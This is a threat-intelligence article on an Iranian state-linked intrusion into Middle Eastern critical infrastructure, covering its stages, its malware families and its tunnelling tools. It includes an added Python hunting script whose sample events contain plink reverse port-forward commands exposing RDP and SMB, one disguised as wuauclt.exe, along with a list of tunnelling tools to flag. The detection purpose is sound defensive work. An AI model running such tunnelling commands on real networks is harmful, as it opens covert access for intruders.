Iranian Hackers Attacking Critical Infrastructure

An Iranian state-sponsored hacking group has been linked to a cyber intrusion aimed at Critical National Infrastructure (CNI) in the Middle East that ran for nearly two years.

These attacks involved "extensive espionage operations and suspected network prepositioning, a tactic often used to maintain persistent access for future strategic advantage," according to the FortiGuard Incident Response team.

The campaign persisted from at least May 2023 to February 2025, with some signs of compromise dating as far back as May 2021.

Attackers initially gained access via stolen VPN credentials and established persistence through multiple web shells and backdoors, including Havoc, HanifNet, HXLibrary, and NeoExpressRAT. They bypassed network segmentation using open-source proxying tools like plink, Ngrok, glider proxy, and ReverseSocks5.

The FortiGuard investigation has produced evidence of a sophisticated, long-running programme of attack focused on espionage and on pre-positioning for future operations:-

  • The attack unfolded in waves, with the adversary deploying new malware and infrastructure over time. They used custom loaders to execute Havoc and SystemBC in memory.
  • In addition to publicly available tools, the adversary deployed novel backdoors such as HanifNet, HXLibrary, and NeoExpressRAT, enabling command execution, file operations, and system discovery.
  • The adversary avoided US-based infrastructure, instead relying on non-U.S. VPS providers.
  • Persistence was maintained through scheduled tasks designed to blend in with legitimate Windows processes.
  • Virtualization infrastructure was actively targeted, with the adversary conducting reconnaissance to understand network configurations.
  • After containment efforts, the adversary attempted to regain access by exploiting ZKTeco ZKBioTime software vulnerabilities, which had not been previously reported in the wild. They also launched targeted phishing attacks, using compromised third-party emails to steal administrator credentials.
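Two of the behaviours listed above, scheduled tasks named to blend in with legitimate Windows tasks and the use of tunnelling tools such as plink and Ngrok to cross network segments, are straightforward to hunt for in endpoint telemetry. The following Python script is an added example written for this article; it is not code from Fortinet's report and contains no indicators from the incident. The event records are constructed to mimic simplified fields of Windows Security Event 4698 (scheduled task created) and Sysmon Event 1 (process create); the trusted-path prefixes, the tool binary names and the "-R" port-forward pattern are the author's assumptions about what a defender would look for, not published IOCs.

```python
import ntpath
import re
from typing import List, Optional, Tuple

# Constructed sample telemetry (not real data): 4698 = scheduled task created,
# 1 = Sysmon process creation. Field names are simplified for the example.
SAMPLE_EVENTS = [
    {"event_id": 4698, "task_name": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
     "command": r"C:\Windows\System32\usoclient.exe", "user": "SYSTEM"},
    {"event_id": 4698, "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "command": r"C:\Users\Public\Libraries\defrag.exe", "user": r"CORP\svc_backup"},
    {"event_id": 1, "image": r"C:\ProgramData\plink.exe",
     "command_line": "plink.exe -N -R 0.0.0.0:8443:127.0.0.1:3389 ops@203.0.113.10",
     "user": r"CORP\svc_backup"},
    {"event_id": 1, "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs -p", "user": "SYSTEM"},
    # plink renamed to look like a Windows Update binary; only the command line gives it away
    {"event_id": 1, "image": r"C:\Windows\Temp\wuauclt.exe",
     "command_line": "wuauclt.exe -N -R 0.0.0.0:1080:127.0.0.1:445 ops@198.51.100.7",
     "user": r"CORP\jdoe"},
]

# Assumed locations from which built-in Microsoft tasks normally launch binaries.
TRUSTED_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Tunnelling tools named in the article; the exact binary names are assumptions.
TUNNEL_TOOLS = {"plink.exe", "ngrok.exe", "glider.exe", "reversesocks5.exe"}

# ssh/plink remote port forward: -R [listen_addr:]listen_port:target_host:target_port
REMOTE_FORWARD = re.compile(r"(?:^|\s)-R\s+\S+:\d+:\S+:\d+(?:\s|$)")


def is_trusted_path(path: str) -> bool:
    """True if the executable lives where built-in Windows tasks normally point."""
    return path.lower().startswith(TRUSTED_PREFIXES)


def check_scheduled_task(event: dict) -> Optional[str]:
    """Flag a task registered under \\Microsoft\\Windows\\ whose binary is not in a trusted path."""
    name, cmd = event["task_name"], event["command"]
    if name.lower().startswith("\\microsoft\\windows\\") and not is_trusted_path(cmd):
        return f"task {name!r} mimics a built-in Windows task but runs {cmd!r}"
    return None


def check_process(event: dict) -> Optional[str]:
    """Flag known tunnelling tools by name, and renamed ones by their -R forwarding syntax."""
    image = ntpath.basename(event["image"]).lower()
    if image in TUNNEL_TOOLS:
        return f"known tunnelling tool {image} launched from {event['image']!r}"
    if REMOTE_FORWARD.search(event["command_line"]):
        return f"ssh-style remote port forward in command line of {image}"
    return None


def triage(events: List[dict]) -> List[Tuple[int, str, str]]:
    """Return (event index, user, reason) for every event that trips a check."""
    findings = []
    for idx, ev in enumerate(events):
        reason = None
        if ev["event_id"] == 4698:
            reason = check_scheduled_task(ev)
        elif ev["event_id"] == 1:
            reason = check_process(ev)
        if reason:
            findings.append((idx, ev["user"], reason))
    return findings


if __name__ == "__main__":
    for idx, user, reason in triage(SAMPLE_EVENTS):
        print(f"[{idx}] {user}: {reason}")
```

The renamed-binary case is the one worth noting: an allow-list of file names catches plink.exe in ProgramData but misses the same tool copied into C:\Windows\Temp under a Windows-looking name, which is why the script also matches the "-R listen:port:host:port" argument shape. In a real deployment the same logic would be expressed as a SIEM or EDR query over the equivalent fields rather than run over a Python list.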

Fortinet researchers noted that the attack shares characteristics with a known Iranian nation-state threat actor called Lemon Sandstorm, which is also known as Parisite, Pioneer Kitten and UNC757. Evidence suggests that this group has been active since at least 2017, striking aerospace, oil and gas, water, and electric sectors across the United States, the Middle East and Europe.

According to industrial cyber security company Dragos, the hackers have used known security flaws in Fortinet, Pulse Secure, and Palo Alto Networks virtual private network (VPN) products to obtain initial access.

In particular, Dragos has identified that the Parisite threat group, operating since at least 2017, targets industrial organisations, including those in the oil and gas, water, and electric sectors. Exploitation of these VPN vulnerabilities for initial access to networks is a key part of the group's modus operandi.

The attack analysed by Fortinet unfolded over four stages starting from May 2023, employing an evolving arsenal of tools as the victim implemented successive countermeasures:-

  • 15 May, 2023 – 29 April, 2024 - Establishing a foothold by using stolen login credentials to access the victim's SSL VPN system, drop web shells on public-facing servers, and deploy three backdoors, Havoc, HanifNet, and HXLibrary, for long-term access.
  • 30 April, 2024 – 22 November, 2024 - Consolidating the foothold by planting more web shells and an additional backdoor called NeoExpressRAT, using tools like plink and Ngrok to burrow deeper into the network, performing targeted exfiltration of the victim's emails, and conducting lateral movement to the virtualisation infrastructure.
  • 23 November, 2024 – 13 December, 2024 - Deploying more web shells and two more backdoors, MeshCentral Agent and SystemBC, in response to initial containment and remediation steps undertaken by the victim.
  • 14 December, 2024 – Present - Attempts to infiltrate the network continue by exploiting known vulnerabilities and spear-phishing attacks aimed at targeted employees to steal Microsoft 365 credentials.

Other custom malware families and open-source tools used in the attack included:

  • HanifNet - An unsigned .NET executable that can retrieve and execute commands from a C2 server (First deployed in August 2023).
  • HXLibrary - A malicious IIS module written in .NET that's designed to retrieve three identical text files hosted on Google Docs to fetch the C2 server and send web requests to it (First deployed in October 2023).
  • CredInterceptor - A DLL-based tool that can harvest credentials from the Windows Local Security Authority Subsystem Service process memory.
  • RemoteInjector - A loader component that's used to execute the next-stage payload like Havoc (First deployed in April 2024).
  • RecShell - A web shell used for initial reconnaissance (First deployed in April 2024).
  • NeoExpressRAT - A backdoor that retrieves a configuration from the C2 server and likely uses Discord for follow-on communications (First deployed in August 2024).
  • DropShell - A web shell with basic file upload capabilities (First deployed in November 2024).
  • DarkLoadLibrary - An open-source loader that's used to launch SystemBC (First deployed in December 2024).

Fortinet said the victim's restricted Operational Technology (OT) network was a key target of the attack, based on the threat actor's extensive reconnaissance activity and their breach of a network segment hosting OT-adjacent systems. That said, there is no evidence that the adversary penetrated the OT network itself. The majority of the malicious activity has been assessed to be hands-on-keyboard operations carried out by several different individuals, given the command errors observed and the consistent work schedule.

Furthermore, a deeper examination of the incident revealed that the threat actor may have had access to the network as early as 15 May 2021. "Throughout the intrusion, the attacker leveraged chained proxies and custom implants to bypass network segmentation and move laterally within the environment," Fortinet said.

"In later stages, they consistently chained four different proxy tools to access internal network segments, demonstrating a sophisticated approach to maintaining persistence and avoiding detection," Fortinet concluded.

Fortinet   |   CISA   |   Dragos   |    Hacker News   |   Hacker News  |   Broadcom  

Image: Ideogram
